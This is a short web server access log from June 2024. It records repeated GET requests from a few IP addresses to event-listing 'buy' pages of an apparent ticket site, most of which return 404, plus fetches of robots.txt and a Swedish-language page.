194.247.173.99 - - [19/Jun/2024:01:22:00 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=82C986F9-0D6E-C921-C10B-10465651AE1E&sortorder=desc&column=section HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:22:05 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=82CD5B36-CDC8-E695-F2A6-A362041AEA89&sortorder=desc&column=section HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:22:11 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=82CE7DE4-6A70-EA4E-8F52-DA16DF3A5E77&sortorder=asc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:22:14 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=30735344-A998-8703-5EFE-812BF0531E5C&sortorder=desc&column=price HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:22:16 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=82CE7DE4-6A70-EA4E-8F52-DA16DF3A5E77&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:22:19 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=3073B46A-4E01-598E-3EDB-B08A261454C6 HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:22:22 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=82CED242-6054-0EDF-1D26-ECDEB1409776&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:22:24 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=3073B46A-4E01-598E-3EDB-B08A261454C6&sortorder=asc&column=price HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:22:27 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=82CED242-6054-0EDF-1D26-ECDEB1409776&sortorder=desc&column=row HTTP/1.1" 404 -
94.130.237.97 - - [19/Jun/2024:01:22:28 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
94.130.237.97 - - [19/Jun/2024:01:22:28 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
95.91.110.20 - - [19/Jun/2024:01:22:29 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=30DFF5A6-5801-42E1-F124-0EA64463049D&sortorder=asc&column=price HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:22:33 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=82CED242-6054-0EDF-1D26-ECDEB1409776&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:22:34 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=30DFF5A6-5801-42E1-F124-0EA64463049D&sortorder=asc&column=row HTTP/1.1" 404 -
94.130.237.97 - - [19/Jun/2024:01:22:35 +0200] "GET /ticket2/opencms/sv/ HTTP/1.1" 200 110318
194.247.173.99 - - [19/Jun/2024:01:22:38 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=82F19FA2-FA7A-0459-E232-50321BC9E2B5&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:22:39 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=30DFF5A6-5801-42E1-F124-0EA64463049D&sortorder=asc&column=section HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:22:43 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=8306671B-449D-8B18-B5D8-8654F10E1EF6&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:22:44 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=30F7BEC1-9734-371E-4424-30AD90B3FB90 HTTP/1.1" 404 -
